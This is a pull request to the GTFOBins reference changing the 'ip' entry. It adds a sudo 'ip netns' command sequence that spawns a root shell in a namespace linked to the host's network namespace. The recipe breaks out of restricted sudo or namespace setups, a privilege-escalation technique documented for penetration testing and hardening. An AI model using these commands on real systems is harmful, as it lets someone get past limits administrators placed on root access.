### PR TITLE
Update ip.md with to break out of restricted network namespace

### DIFF
--- a/_gtfobins/ip.md
+++ b/_gtfobins/ip.md
@@ -22,6 +22,8 @@ functions:
     - description: This only works for Linux with CONFIG_NET_NS=y.
       code: |
         sudo ip netns add foo
-        sudo ip netns exec foo /bin/sh
+        sudo ip netns exec foo /bin/ln -s /proc/1/ns//net /var/run/netns/bar
+        sudo ip netns exec bar /bin/sh
         sudo ip netns delete foo
+        sudo ip netns delete bar
 ---

--- a/_gtfobins/ip.md
+++ b/_gtfobins/ip.md
@@ -22,8 +22,14 @@ functions:
     - description: This only works for Linux with CONFIG_NET_NS=y.
       code: |
         sudo ip netns add foo
-        sudo ip netns exec foo /bin/ln -s /proc/1/ns//net /var/run/netns/bar
+        sudo ip netns exec foo /bin/sh
+        sudo ip netns delete foo
+    - description: This only works for Linux with CONFIG_NET_NS=y. This version also grants network access.
+      code: |
+        sudo ip netns add foo
+        sudo ip netns exec foo /bin/ln -s /proc/1/ns/net /var/run/netns/bar
         sudo ip netns exec bar /bin/sh
         sudo ip netns delete foo
         sudo ip netns delete bar
+
 ---


### PR DESCRIPTION
add command to allow access to interfaces in restricted namespace without affecting host networking.
original command restricts networking to the `lo` adapter only. This fixes that. I did not check if this works for the SUID version though. 